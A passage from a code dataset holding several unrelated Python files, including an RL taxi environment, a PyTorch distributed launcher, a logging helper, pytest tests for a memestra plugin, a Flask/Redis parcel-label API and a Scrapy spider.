np.concatenate((location_vector,time_vector,day_vector),axis=0)\n return state_encod\n\n\n # Use this function if you are using architecture-2 \n # def state_encod_arch2(self, state, action):\n # \"\"\"convert the (state-action) into a vector so that it can be fed to the NN. This method converts a given state-action pair into a vector format. Hint: The vector is of size m + t + d + m + m.\"\"\"\n\n \n # return state_encod\n\n\n ## Getting number of requests\n\n def requests(self, state):\n \"\"\"Determining the number of requests basis the location. \n Use the table specified in the MDP and complete for rest of the locations\"\"\"\n location = state[0]\n if location == 1:\n requests = np.random.poisson(2)\n elif location == 2:\n requests = np.random.poisson(12)\n elif location == 3:\n requests = np.random.poisson(4)\n elif location == 4:\n requests = np.random.poisson(7)\n else:\n requests = np.random.poisson(8)\n\n if requests >15:\n requests =15\n\n possible_actions_index = random.sample(range(1, (m-1)*m +1), requests) # (0,0) is not considered as customer request\n actions = [self.action_space[i-1] for i in possible_actions_index]\n\n \n actions.append([0,0])\n\n return possible_actions_index,actions \n \n\n\n\n def reward_func(self, state, action, Time_matrix):\n \"\"\"Takes in state, action and Time-matrix and returns the reward\"\"\"\n if (action[0] == 0 and action[1] == 0):\n reward = -C\n else:\n reward = R * (Time_matrix[action[0]-1][action[1]-1][state[1]][state[2]]) - C * ((Time_matrix[action[0]-1][action[1]-1][state[1]][state[2]]) + (Time_matrix[state[0]-1][action[0]-1][state[1]][state[2]]))\n return reward\n\n\n\n\n def next_state_func(self, state, action, Time_matrix):\n \"\"\"Takes state and action as input and returns next state\"\"\"\n \n if (action[0] == 0 and action[1] == 0):\n idle_next_time = state[1] + 1\n if not ((state[2]+(idle_next_time // 24)) > 6):\n if (idle_next_time // 24 >= 1):\n next_state = (state[0], 0 , state[2] + 1)\n else:\n next_state = (state[0],idle_next_time, state[2])\n else:\n if(idle_next_time // 24 >= 1):\n next_state = (state[0], 0, 0) \n else:\n next_state = (state[0],idle_next_time, state[2])\n \n return next_state\n else:\n \n active_next_time = state[1] + Time_matrix[action[0]-1][action[1]-1][state[1]][state[2]]\n \n if not ((state[2]+(active_next_time 
// 24)) > 6):\n if (active_next_time // 24 >= 1):\n next_state = (action[1],(active_next_time % 24), state[2]+(active_next_time // 24))\n else:\n next_state = (action[1], active_next_time , state[2] )\n else:\n if(active_next_time // 24 >= 1):\n next_state = (action[1],(active_next_time % 24) , (active_next_time // 24)-1)\n else:\n next_state = (action[1], active_next_time , state[2] )\n return next_state\n\n\n\n\n def reset(self):\n return self.action_space, self.state_space, self.state_init\n","sub_path":"Env.py","file_name":"Env.py","file_ext":"py","file_size_in_byte":4978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"439265954","text":"import os\nimport re\nimport socket\nimport torch\nimport torch.distributed\n# import torch.multipro\n\ndef init_slurm(fn, backend=\"gloo\"):\n slurm_nodelist = os.environ[\"SLURM_NODELIST\"]\n root_node = slurm_nodelist.split(\" \")[0].split(\",\")[0]\n if \"[\" in root_node:\n name, numbers = root_node.split(\"[\", maxsplit=1)\n number = numbers.split(\",\", maxsplit=1)[0]\n if \"-\" in number:\n number = number.split(\"-\")[0]\n number = re.sub(\"[^0-9]\", \"\", number)\n root_node = name + number\n os.environ[\"MASTER_ADDR\"] = root_node\n\n port = os.environ[\"SLURM_JOB_ID\"]\n port = port[-4:] # use the last 4 numbers in the job id as the id\n port = int(port) + 15000 # all ports should be in the 10k+ range\n os.environ[\"MASTER_PORT\"] = str(port)\n\n rank = int(os.environ[\"SLURM_PROCID\"])\n world_size = int(os.environ[\"SLURM_NTASKS\"])\n torch.distributed.init_process_group(backend, rank=rank, world_size=world_size)\n fn()\n\ndef _local_init_process(rank, size, fn, backend):\n os.environ[\"MASTER_ADDR\"] = \"127.0.0.1\"\n os.environ[\"MASTER_PORT\"] = \"12910\"\n torch.distributed.init_process_group(backend, rank=rank, world_size=size)\n fn()\n\ndef init_local(size, fn, backend=\"gloo\"):\n import torch.multiprocessing\n\n processes = []\n torch.multiprocessing.set_start_method(\"spawn\")\n for rank in range(size):\n p = torch.multiprocessing.Process(target=_local_init_process, args=(rank, size, fn, backend))\n p.start()\n processes.append(p)\n\n for p in processes:\n p.join()\n\n\ndef run():\n print(\n \"Hello from process {} on node {} out of {}\"\n \"\".format(torch.distributed.get_rank(), socket.gethostname(), torch.distributed.get_world_size())\n )\n\ndef main():\n if \"SLURM_JOB_ID\" in os.environ:\n init_slurm(run)\n else:\n init_local(torch.cuda.device_count(), run)\n\nif __name__ == '__main__':\n main()\n","sub_path":"distributed_example.py","file_name":"distributed_example.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"329965733","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n log setup, including system log and business log\n 使用的时候在程序启动后加载init_logger进行初始化,需要打印日志的py文件中加载INFO,ERROR进行日志输出\n\"\"\"\n\nimport os\nimport time\nimport inspect\nimport logging\nimport stat\nimport logging.handlers\n\nLOG_PATH = '/flask/'\nG_SYS_LOGGER = None\nG_MSG_LOGGER = None\nG_MODULE_NAME = \"\"\nG_FUNCTION_NAME = \"\"\n\n\ndef __sys_logger():\n \"\"\"\n get system logger\n :return:\n \"\"\"\n global G_SYS_LOGGER, G_MODULE_NAME, G_FUNCTION_NAME\n\n date_now = ''\n base_dir = os.path.join(LOG_PATH, date_now)\n if not os.path.isdir(base_dir):\n os.makedirs(base_dir)\n os.chmod(base_dir, stat.S_IRWXO | stat.S_IRWXG | stat.S_IRWXU)\n\n log_dir = os.path.join(base_dir, G_MODULE_NAME, 'log')\n if not 
os.path.isdir(log_dir):\n os.makedirs(log_dir)\n os.chmod(log_dir, stat.S_IRWXO | stat.S_IRWXG | stat.S_IRWXU)\n\n log_file = os.path.join(log_dir, G_FUNCTION_NAME + '.log')\n if not os.path.exists(log_file):\n tmp_file = open(log_file, 'w')\n tmp_file.close()\n G_SYS_LOGGER = SystemLog(log_file)\n\n if G_SYS_LOGGER is None:\n G_SYS_LOGGER = SystemLog(log_file)\n\n return G_SYS_LOGGER\n\n\ndef __msg_logger():\n \"\"\"\n get business logger\n :return:\n \"\"\"\n global G_MSG_LOGGER, G_MODULE_NAME, G_FUNCTION_NAME\n\n #date_now = time.strftime(\"%Y%m%d\", time.localtime())\n date_now = ''\n base_dir = os.path.join(LOG_PATH, date_now)\n if not os.path.isdir(base_dir):\n os.makedirs(base_dir)\n os.chmod(base_dir, stat.S_IRWXO | stat.S_IRWXG | stat.S_IRWXU)\n\n #log_dir = os.path.join(base_dir, G_MODULE_NAME, 'log')\n log_dir = os.path.join(base_dir, G_MODULE_NAME)\n if not os.path.isdir(log_dir):\n os.makedirs(log_dir)\n os.chmod(log_dir, stat.S_IRWXO | stat.S_IRWXG | stat.S_IRWXU)\n\n log_file = os.path.join(log_dir, G_FUNCTION_NAME + '_message.log')\n if not os.path.exists(log_file):\n tmp_file = open(log_file, 'w')\n tmp_file.close()\n G_MSG_LOGGER = MessageLog(log_file)\n\n if G_MSG_LOGGER is None:\n G_MSG_LOGGER = MessageLog(log_file)\n\n return G_MSG_LOGGER\n\n\ndef init_logger(module_name='', function_name=''):\n \"\"\"\n :param module_name:\n :param function_name: \"功能非函数\"\n :return:\n \"\"\"\n global G_MODULE_NAME, G_FUNCTION_NAME\n\n if module_name and function_name:\n G_MODULE_NAME = module_name\n G_FUNCTION_NAME = function_name\n return True\n return False\n\n\ndef SYS_DEBUG(msg):\n\n __sys_logger().debug(msg)\n\n\ndef SYS_INFO(msg):\n __sys_logger().info(msg)\n\n\ndef SYS_WARN(msg):\n __sys_logger().warn(msg)\n\n\ndef SYS_ERROR(msg):\n __sys_logger().debug(msg)\n\n\ndef SYS_CRITICAL(msg):\n __sys_logger().critical(msg)\n\n\ndef DEBUG(msg):\n __msg_logger().debug(msg)\n\n\ndef INFO(msg):\n __msg_logger().info(msg)\n\n\ndef WARN(msg):\n __msg_logger().warn(msg)\n\n\ndef ERROR(msg):\n __msg_logger().error(msg)\n\n\ndef CRITICAL(msg):\n __msg_logger().critical(msg)\n\n\nclass LogBase:\n def __init__(self, logger):\n self.m_logger = logger\n\n def printf_now(self):\n return time.strftime('%Y-%m-%d %H:%M:%S', time.localtime())\n\n def log_message(self, level, message):\n global G_MODULE_NAME, G_FUNCTION_NAME\n frame, filename, lineno, functionname, code, unknowfield = inspect.stack()[\n 3]\n filename = os.path.abspath(filename)\n return \"%s\\t%s%s%s\\t%s:%s:%s\\t%s\" % \\\n (self.printf_now(), level, G_MODULE_NAME,\n G_FUNCTION_NAME, filename, lineno, functionname, message)\n\n def debug(self, message):\n self.m_logger.debug(self.log_message('DEBUG', message))\n\n def info(self, message):\n self.m_logger.info(self.log_message('INFO', message))\n\n def warn(self, message):\n self.m_logger.warn(self.log_message('WARN', message))\n\n def error(self, message):\n self.m_logger.error(self.log_message('ERROR', message))\n\n def critical(self, message):\n self.m_logger.critical(self.log_message('CRITICAL', message))\n\n\nclass MessageLog(LogBase):\n def __init__(self, logfile):\n logger = logging.getLogger('msg')\n logger.setLevel(logging.DEBUG)\n\n # path = os.path.abspath(logfile)\n # self._handler = logging.FileHandler(path)\n # logger.addHandler(self._handler)\n # logger.setLevel(logging.DEBUG)\n\n # create a streamhandler to output to console\n ch = logging.StreamHandler()\n ch.setLevel(logging.DEBUG)\n logger.addHandler(ch)\n\n self.hdlr = 
logging.handlers.TimedRotatingFileHandler(logfile, when='D', interval=1, backupCount=24)\n self.hdlr.setLevel(logging.DEBUG)\n self.hdlr.suffix = \"%Y-%m-%d_%H-%M-%S.log\"\n logger.addHandler(self.hdlr)\n\n LogBase.__init__(self, logger)\n\n def ___del__(self):\n # self._handler.flush()\n # self.m_logger.removeHandler(self._handler)\n self.hdlr\n self.m_logger.removeHandler(self.hdlr)\n\n\n\nclass SystemLog(LogBase):\n def __init__(self, logfile):\n path = os.path.abspath(logfile)\n self._handler = logging.FileHandler(path)\n logger = logging.getLogger('sys')\n logger.addHandler(self._handler)\n logger.setLevel(logging.INFO)\n LogBase.__init__(self, logger)\n\n def ___del__(self):\n self._handler.flush()\n self.m_logger.removeHandler(self._handler)\n\n\ndef logger_setup(logger_name='', file_name='/intellif/server.log'):\n \"\"\"used to single file\n :param logger_name:\n :param file_name:\n :return:\n \"\"\"\n logger = logging.getLogger(logger_name)\n logger.setLevel(level=logging.DEBUG)\n formatter = logging.Formatter('%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',\n '%Y-%m-%d %H:%M:%S')\n\n handler = logging.FileHandler(file_name)\n handler.setFormatter(formatter)\n handler.setLevel(logging.DEBUG)\n logger.addHandler(handler)\n\n console_handler = logging.StreamHandler()\n console_handler.formatter = formatter\n console_handler.setLevel(logging.DEBUG)\n logger.addHandler(console_handler)","sub_path":"logging/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":6197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"389939373","text":"#!/usr/bin/env python2.7\n__author__ = 'berm2224'\n\n\"Local modules\"\nimport postproc_registration as postreg\nimport os\nimport multiprocessing as multip\nfrom functools import partial\n\n\nif __name__ == \"__main__\":\n print(\"postproc_registration.py is being run directly\")\n\n #os.chdir(\"/mnt/SSDDATA/chirurgie/davidfortin/Nolette_2013_10_30\")\n\n reg = postreg.Registration(outputfolder='test_reg')\n \"\"\"regpool = multip.Pool()\n \n reg_fmri_to_T1 = partial(postreg.ANTS_registration,\n samemode=False,\n nonlinear=False,\n path_input=os.path.join(reg.ABS_inputdir, 'Neuro_20131030'),\n path_out=os.path.join(reg.ABS_outputdir, 'reg'),\n path_ref=os.path.join(reg.ABS_inputdir, 'Neuro_20131030'),\n inputname='fingertap_r_meanvol',\n outname='fmri_2_T2',\n refname='t1_in_t2')\n regpool.map_async(reg_fmri_to_T1,[1])\n\n regpool.join()\n regpool.close()\"\"\"\n\n warppool = multip.Pool()\n\n\n warp_corrZ_to_T1 = partial(postreg.ANTS_apply_warp,\n path_input=os.path.join(reg.ABS_inputdir, 'Neuro_20131030'),\n path_out=os.path.join(reg.ABS_outputdir),\n path_ref=os.path.join(reg.ABS_inputdir, 'Neuro_20131030'),\n path_tranf=os.path.join(reg.ABS_outputdir,'reg'),\n inputname='fingertap_r_corr_Z_pos',\n outname='fingertap_r_corr_Z_T2space',\n refname='t1_in_t2',\n tranfprefix='fmri_2_T2')\n warppool.map_async(warp_corrZ_to_T1, [1])\n\n warp_meanvol_to_T1 = partial(postreg.ANTS_apply_warp,\n path_input=os.path.join(reg.ABS_inputdir, 'Neuro_20131030'),\n path_out=os.path.join(reg.ABS_outputdir),\n path_ref=os.path.join(reg.ABS_inputdir, 'Neuro_20131030'),\n path_tranf=os.path.join(reg.ABS_outputdir, 'reg'),\n inputname='fingertap_r_meanvol',\n outname='fingertap_r_meanvol_T2space',\n refname='t1_in_t2',\n tranfprefix='fmri_2_T2')\n warppool.map_async(warp_meanvol_to_T1, [1])\n\n warp_corrZ_to_T1 = partial(postreg.ANTS_apply_warp,\n 
path_input=os.path.join(reg.ABS_inputdir, 'Neuro_20131030'),\n path_out=os.path.join(reg.ABS_outputdir),\n path_ref=os.path.join(reg.ABS_inputdir, 'Neuro_20131030'),\n path_tranf=os.path.join(reg.ABS_outputdir, 'reg'),\n inputname='pied_r_corr_Z_pos',\n outname='pied_r_corr_Z_T2space',\n refname='t1_in_t2',\n tranfprefix='fmri_2_T2')\n warppool.map_async(warp_corrZ_to_T1, [1])\n\n warppool.join()\n\nelse:\n print(\"postproc_vesselness.py is imported into another module\")\n","sub_path":"postproc_chirurgie.py","file_name":"postproc_chirurgie.py","file_ext":"py","file_size_in_byte":3225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"352238678","text":"import os\nimport tempfile\nfrom pathlib import Path\nfrom unittest.mock import Mock\nfrom copy import deepcopy\nimport pytest\n\nfrom memestra import memestra, nbmemestra\nfrom pyls_memestra.plugin import format_text, pyls_lint, pyls_settings\nfrom pylsp import uris\nfrom pylsp.config.config import Config\nfrom pylsp.workspace import Workspace, Document\n\nhere = Path(__file__).parent\ndata = here / \"data\"\n\n@pytest.fixture\ndef config(tmpdir):\n config = Config(uris.from_fs_path(str(tmpdir)), {}, 0, {})\n config.update(pyls_settings())\n return config\n\n@pytest.fixture\ndef workspace(tmpdir, config):\n ws = Workspace(uris.from_fs_path(str(tmpdir)), Mock())\n ws._config = config\n return ws\n\n@pytest.yield_fixture\ndef document(workspace):\n temp_file = tempfile.NamedTemporaryFile(mode='w', delete=False)\n\n def write_doc(text):\n temp_file.write(text)\n temp_file.close()\n doc = Document(uris.from_fs_path(temp_file.name), workspace)\n return doc\n\n yield write_doc\n os.remove(temp_file.name)\n\ndef build_diagnostic(name, start, end, reason, source=\"memestra\", severity=3):\n if reason is None:\n message = name + \" is deprecated.\"\n else:\n message = name + \" is deprecated. 
\" + reason\n\n return {\n \"source\": source,\n \"range\": {\n \"start\": {\n \"line\": start[0],\n \"character\": start[1]\n },\n \"end\": {\n \"line\": end[0],\n \"character\": end[1]\n }\n },\n \"message\": message,\n \"severity\": severity\n }\n\ndef update_setting(config, name, value):\n settings = deepcopy(config._settings)\n settings[\"plugins\"][\"pyls-memestra\"][name] = value\n config.update(settings)\n\ndef test_basic(workspace, config):\n doc = Document(uris.from_fs_path(str(data / \"file.py\")), workspace)\n diagnostics = pyls_lint(config, doc)\n\n assert diagnostics == [\n build_diagnostic(\"foo\", (7, 4), (7, 7), \"deprecated at some point\"),\n build_diagnostic(\"imported\", (9, 0), (9, 8), \"test reason\"),\n ]\n\ndef test_decorator_name(workspace, config, document):\n doc = document(\"\"\"\nimport bogus\n\n@bogus.deprecateme(\"nope\")\ndef foo():\n pass\n\nfoo()\n\"\"\")\n update_setting(config, \"decorator_module\", \"bogus\")\n update_setting(config, \"decorator_function\", \"deprecateme\")\n diagnostics = pyls_lint(config, doc)\n\n assert diagnostics == [\n build_diagnostic(\"foo\", (7, 0), (7, 3), \"nope\"),\n ]\n\ndef test_reason_keyword(workspace, config, document):\n doc = document(\"\"\"\nimport deprecated\n\n@deprecated.deprecated(excuse=\"too old\")\ndef foo():\n pass\n\nfoo()\n\"\"\")\n update_setting(config, \"reason_keyword\", \"excuse\")\n diagnostics = pyls_lint(config, doc)\n\n assert diagnostics == [\n build_diagnostic(\"foo\", (7, 0), (7, 3), \"too old\"),\n ]\n\ndef test_empty_reason(workspace, config, document):\n doc = document(\"\"\"\nimport deprecated\n\n@deprecated.deprecated\ndef foo():\n pass\n\nfoo()\n\"\"\")\n update_setting(config, \"reason_keyword\", \"excuse\")\n diagnostics = pyls_lint(config, doc)\n\n assert diagnostics == [\n build_diagnostic(\"foo\", (7, 0), (7, 3), None),\n ]\n\n@pytest.mark.skip(\"This test needs improvements to memestra imports\")\ndef test_recursive(workspace, config, document):\n doc = document(\"\"\"\nfrom testpackage import bar\n\nbar()\n\"\"\")\n update_setting(config, \"recursive\", True)\n diagnostics = pyls_lint(config, doc)\n\n assert diagnostics == [\n build_diagnostic(\"bar\", (3, 0), (3, 3), \"nested\"),\n ]\n\ndef test_search_paths(workspace, config, document):\n doc = document(\"\"\"\nfrom bar import bar\n\nbar()\n\"\"\")\n update_setting(config, \"additional_search_paths\",\n [str(data / \"testpackage\")])\n diagnostics = pyls_lint(config, doc)\n\n assert diagnostics == [\n build_diagnostic(\"bar\", (3, 0), (3, 3), \"nested\"),\n ]\n\ndef test_cache_dir(workspace, config, document):\n doc = document(\"\"\"\nfrom cachetest import bar\n\nbar()\n\"\"\")\n update_setting(config, \"additional_search_paths\", [str(data)])\n update_setting(config, \"cache_dir\", str(data / \"cache\"))\n diagnostics = pyls_lint(config, doc)\n\n assert diagnostics == [\n build_diagnostic(\"bar\", (3, 0), (3, 3), \"cached\"),\n ]\n\ndef test_pyls_format_text_syntax():\n keywords = [('foo', '', 7, 4, 'reason1'), ('foo', '', 9, 0, 'reason2')]\n\n result = format_text(keywords, [])\n assert result == [\n build_diagnostic(\"foo\", (6, 4), (6, 7), 'reason1'),\n build_diagnostic(\"foo\", (8, 0), (8, 3), 'reason2')\n ]\n","sub_path":"tests/test_plugin.py","file_name":"test_plugin.py","file_ext":"py","file_size_in_byte":4625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"581832005","text":"class ListNode(object):\n def __init__(self, value, next=None):\n self.val = value\n 
self.next = next\n\n\nclass LinkedList(object):\n def __init__(self):\n self.root = None\n\n def addNode(self, data):\n if self.root is None:\n self.root = ListNode(data)\n return self.root\n else:\n cursor = self.root\n while cursor.next is not None:\n cursor = cursor.next\n cursor.next = ListNode(data)\n return self.root\n\n def listPrint(self):\n node = self.root\n while node:\n print(node.val)\n node = node.next\n\n\nclass Solution:\n def printListFromTailToHead(self, listNode):\n if not listNode:\n return []\n\n result = []\n while listNode:\n result.insert(0, listNode.val)\n listNode = listNode.next\n return result\n\n\nll = LinkedList()\nfor i in range(10):\n ll.addNode(i)\nll.listPrint()\ns = Solution()\nprint(s.printListFromTailToHead(ll.root))\n","sub_path":"06_PrintListInReversedOrder/PrintListInReversedOrder.py","file_name":"PrintListInReversedOrder.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"158818138","text":"from flask import Flask, g\nfrom flask import request, make_response\nfrom flask import jsonify\nfrom flask_hal import HAL\nfrom flask_hal.document import Document, Embedded\nfrom flask_hal.link import Link\n\nfrom jwt import decode\nfrom redis import Redis\nfrom os import getenv\nfrom dotenv import load_dotenv\nfrom uuid import uuid4\n\nimport logging\n\nload_dotenv()\ndb = Redis(host=getenv(\"REDIS_HOST\"), port=getenv(\"REDIS_PORT\"), db=getenv(\"REDIS_NUM\"), password=getenv(\"REDIS_PASS\"))\nJWT_SECRET = getenv(\"JWT_SECRET\")\napp = Flask(__name__)\nHAL(app)\nlogging.basicConfig(level=logging.INFO)\n\n@app.before_request\ndef before_request_func():\n token = request.headers.get('Authorization','').replace('Bearer ','')\n try:\n g.authorization = decode(token, JWT_SECRET, algorithms=['HS256'])\n logging.info(\"Authorized: \" + g.authorization.get(\"username\"))\n except Exception as e:\n g.authorization = {}\n logging.info(\"Unauthorized: \" + str(e))\n\n@app.route('/courier/label', methods=[\"GET\"])\ndef list_labels():\n username = g.authorization.get(\"username\")\n usertype = g.authorization.get(\"usertype\")\n if not username:\n return error(\"Log in to get labels list\", 401)\n if usertype != \"courier\":\n return error(\"Resource available only for couriers\", 401)\n label_ids = db.keys(\"label:*\")\n for i, id in enumerate(label_ids):\n label_ids[i] = id.decode('utf-8')\n links=[]\n labels = []\n for id in label_ids:\n label = {}\n label['id'] = id.split(\":\")[1]\n label['name'] = db.hget(id, 'name').decode('utf-8')\n label['receiver'] = db.hget(id, 'receiver').decode('utf-8')\n label['size'] = db.hget(id, 'size').decode('utf-8')\n label['target'] = db.hget(id, 'target').decode('utf-8')\n labels.append(label)\n if db.hget(id, \"picked\").decode('utf-8') == \"false\":\n links.append(Link(f\"label:{label['name']}:pick\", f\"/courier/package/{label['id']}\"))\n response_body = {}\n response_body['labels'] = labels\n document = Document(data=response_body, links=links)\n return document.to_json(), 200\n\n@app.route('/courier/package', methods=[\"GET\"])\ndef get_packages():\n username = g.authorization.get(\"username\")\n usertype = g.authorization.get(\"usertype\")\n if not username:\n return error(\"Log in to get packages\", 401)\n if usertype != \"courier\":\n return error(\"Resource available only for couriers\", 401)\n package_ids = db.smembers(f\"courier:{username}:packages\")\n package_ids = list(package_ids)\n \n for i, id in 
enumerate(package_ids):\n package_ids[i] = id.decode('utf-8')\n links=[]\n packages = []\n for id in package_ids:\n package = {}\n package['id'] = id\n label_id = db.hget(f\"package:{id}\", \"label_id\").decode('utf-8')\n package['status'] = db.hget(f\"package:{id}\", \"status\").decode('utf-8')\n package['name'] = db.hget(f\"label:{label_id}\", \"name\").decode('utf-8')\n package['receiver'] = db.hget(f\"label:{label_id}\", \"receiver\").decode('utf-8')\n package['size'] = db.hget(f\"label:{label_id}\", \"size\").decode('utf-8')\n package['target'] = db.hget(f\"label:{label_id}\", \"target\").decode('utf-8')\n packages.append(package)\n links.append(Link(f\"package:{package['name']}:changestatus\", f\"/courier/package/{package['id']}\"))\n response_body = {}\n response_body['packages'] = packages\n document = Document(data=response_body, links=links)\n return document.to_json(), 200\n \n@app.route('/courier/package/', methods=[\"POST\"])\ndef create_package(label_id):\n username = g.authorization.get(\"username\")\n usertype = g.authorization.get(\"usertype\")\n if not username:\n return error(\"Log in to add package\", 401)\n if usertype != \"courier\":\n return error(\"Resource available only for couriers\", 401)\n if len(db.keys(f\"label:{label_id}\")) == 0:\n return error(f\"Cannot find label of id: {label_id}\", 400)\n if db.hget(f\"label:{label_id}\", \"picked\").decode('utf-8') == \"true\":\n return error(\"Already created\", 400)\n db.hset(f\"label:{label_id}\", \"picked\", \"true\")\n id = str(uuid4())\n db.hset(f\"package:{id}\", \"label_id\", label_id)\n db.hset(f\"package:{id}\", \"status\", \"ODEBRANA\")\n db.sadd(f\"courier:{username}:packages\", id)\n links = []\n links.append(Link('package:changestatus', f'/courier/package/{id}'))\n document = Document(data={\"message\": id}, links=links)\n db.hset(f\"notification:{label_id}\", \"new_status\", \"ODEBRANA\")\n \n return document.to_json(), 201\n\n@app.route('/courier/package/', methods=[\"PUT\"])\ndef change_status(package_id):\n username = g.authorization.get(\"username\")\n usertype = g.authorization.get(\"usertype\")\n if not username:\n return error(\"Log in to change package status\", 401)\n if usertype != \"courier\":\n return error(\"Resource available only for couriers\", 401)\n allowed_status = [\"ODEBRANA\", \"W DRODZE\", \"DOSTARCZONA\"]\n new_status = request.args.get('status')\n if not new_status in allowed_status:\n return error(f\"Not allowed status: {new_status}\", 400)\n db.hset(f\"package:{package_id}\", \"status\", new_status)\n label_id = db.hget(f\"package:{package_id}\", \"label_id\")\n label_id = label_id.decode('utf-8')\n links = []\n document = Document(data={\"message\": f\"Status changed into {new_status}\"}, links=links)\n db.hset(f\"notification:{label_id}\", \"new_status\", new_status)\n return document.to_json(), 200\n\n@app.route('/sender/notification', methods=[\"GET\"])\ndef get_all_notifications():\n username = g.authorization.get(\"username\")\n usertype = g.authorization.get(\"usertype\")\n if not username:\n return error(\"Log in to get notifications\", 401)\n if usertype != \"sender\":\n return error(\"Resource available only for senders\", 401)\n label_ids = db.smembers(f\"user:{username}:labels\")\n label_ids = list(label_ids)\n \n for i, id in enumerate(label_ids):\n label_ids[i] = id.decode('utf-8')\n notifications = []\n for id in label_ids:\n if db.exists(f\"notification:{id}\"):\n notification = {}\n notification['new_status'] = db.hget(f\"notification:{id}\", 
\"new_status\").decode('utf-8')\n notification['label'] = db.hget(f\"label:{id}\", \"name\").decode('utf-8')\n notifications.append(notification)\n db.delete(f\"notification:{id}\")\n response_body = {}\n response_body['notifications'] = notifications\n document = Document(data=response_body, links=[])\n return document.to_json(), 200\n \n\n@app.route('/sender/label', methods=[\"GET\"])\ndef get_labels():\n username = g.authorization.get(\"username\")\n usertype = g.authorization.get(\"usertype\")\n if not username:\n return error(\"Log in to get labels\", 401)\n if usertype != \"sender\":\n return error(\"Resource available only for senders\", 401)\n label_ids = db.smembers(f\"user:{username}:labels\")\n label_ids = list(label_ids)\n \n for i, id in enumerate(label_ids):\n label_ids[i] = id.decode('utf-8')\n links=[]\n labels = []\n for id in label_ids:\n label = {}\n label['id'] = id\n label['name'] = db.hget(f\"label:{id}\", \"name\").decode('utf-8')\n label['receiver'] = db.hget(f\"label:{id}\", \"receiver\").decode('utf-8')\n label['size'] = db.hget(f\"label:{id}\", \"size\").decode('utf-8')\n label['target'] = db.hget(f\"label:{id}\", \"target\").decode('utf-8')\n labels.append(label)\n if db.hget(f\"label:{id}\", \"picked\").decode('utf-8') == \"false\":\n links.append(Link(f\"label:{label['id']}:delete\", f\"/sender/label/{id}\"))\n response_body = {}\n response_body['labels'] = labels\n document = Document(data=response_body, links=links)\n return document.to_json(), 200\n\n@app.route('/sender/label', methods=[\"POST\"])\ndef add_label():\n username = g.authorization.get(\"username\")\n usertype = g.authorization.get(\"usertype\")\n if not username:\n return error(\"Log in to add labels\", 401)\n if usertype != 'sender':\n return error(\"Resource available only for senders\", 401)\n id = str(uuid4())\n name = request.form.get(\"name\")\n receiver = request.form.get(\"receiver\")\n size = request.form.get(\"size\")\n target = request.form.get(\"target\")\n if not name:\n return error(\"No value of name\", 400)\n if not receiver:\n return error(\"No value of receiver\", 400)\n if not size:\n return error(\"No value of size\", 400)\n if not target:\n return error(\"No value of target\", 400)\n db.hset(f\"label:{id}\", \"name\", name)\n db.hset(f\"label:{id}\", \"receiver\", receiver)\n db.hset(f\"label:{id}\", \"size\", size)\n db.hset(f\"label:{id}\", \"target\", target)\n db.hset(f\"label:{id}\", \"picked\", \"false\")\n db.sadd(f\"user:{username}:labels\", id)\n links = []\n links.append(Link('label:delete', f'/sender/label/{id}'))\n document = Document(data={\"message\": id}, links=links)\n return document.to_json(), 201\n\n@app.route('/sender/label/', methods=[\"DELETE\"])\ndef delete_label(label_id):\n username = g.authorization.get(\"username\")\n usertype = g.authorization.get(\"usertype\")\n if not username:\n return error(\"Log in to delete labels\", 401)\n if usertype != 'sender':\n return error(\"Resource available only for senders\", 401)\n\n if not db.sismember(f\"user:{username}:labels\", label_id):\n return error(f\"No such label for user {username}\", 403)\n if db.hget(f\"label:{label_id}\", \"picked\").decode('utf-8') == \"true\":\n return error(\"Cannot remove picked label\", 403)\n db.delete(f\"label:{label_id}\")\n db.srem(f\"user:{username}:labels\", label_id)\n document = Document(data={\"message\": label_id}, links=[])\n return document.to_json(), 200\n\n@app.route('/sender', methods=[\"GET\"])\ndef sender():\n links = []\n links.append(Link('label', 
'/sender/label'))\n document = Document(data={}, links=links)\n return document.to_json(), 200\n\n@app.route('/courier', methods=[\"GET\"])\ndef courier():\n links = []\n links.append(Link('label', '/courier/label'))\n links.append(Link('label', '/courier/package'))\n document = Document(data={}, links=links)\n return document.to_json(), 200\n\n@app.route('/', methods=[\"GET\"])\ndef info():\n links = []\n links.append(Link('sender', '/sender'))\n links.append(Link('courier', '/courier'))\n document = Document(data={}, links=links)\n return document.to_json(), 200\n\ndef error(msg, status=400):\n return make_response({\"status\":\"error\", \"message\":msg}, status)\n\n\n\nif __name__ == '__main__':\n app.run(host=\"0.0.0.0\", port=5000)","sub_path":"web-service/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":10671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"43355441","text":"# -*- coding: utf-8 -*-\nimport scrapy\n\n\nclass SnippetsSpider(scrapy.Spider):\n name = 'snippets'\n allowed_domains = ['syntaxdb.com']\n start_urls = ['https://syntaxdb.com/reference/']\n\n def parse(self, response):\n dropdown = response.xpath(\"//ul[@id='language-dropdown']\")\n for a in dropdown.xpath(\"./li/a\"):\n yield response.follow(\n url=a.xpath(\".//@href\").get(), \n callback=self.parse_language, \n meta={'language': a.xpath(\"./text()\").get()}\n )\n \n def parse_language(self, response):\n \n for ul_c in response.xpath(\"//ul[@class='collapsible']\"):\n for li in ul_c.xpath(\"./li/div/ul/li\"):\n yield response.follow(\n url=li.xpath(\".//@href\").get(),\n callback=self.parse_snippet,\n meta={\n 'language': response.request.meta['language'],\n 'title': li.xpath(\".//text()\").get(),\n }\n )\n \n def parse_snippet(self, response):\n code, example = response.xpath(\"//code[1]/text()\").getall()\n \n yield {\n 'title': response.request.meta['title'],\n 'language': response.request.meta['language'],\n 'code': code,\n 'example': example,\n 'notes': '\\n'.join(response.css(\".col.s12.m8.l8 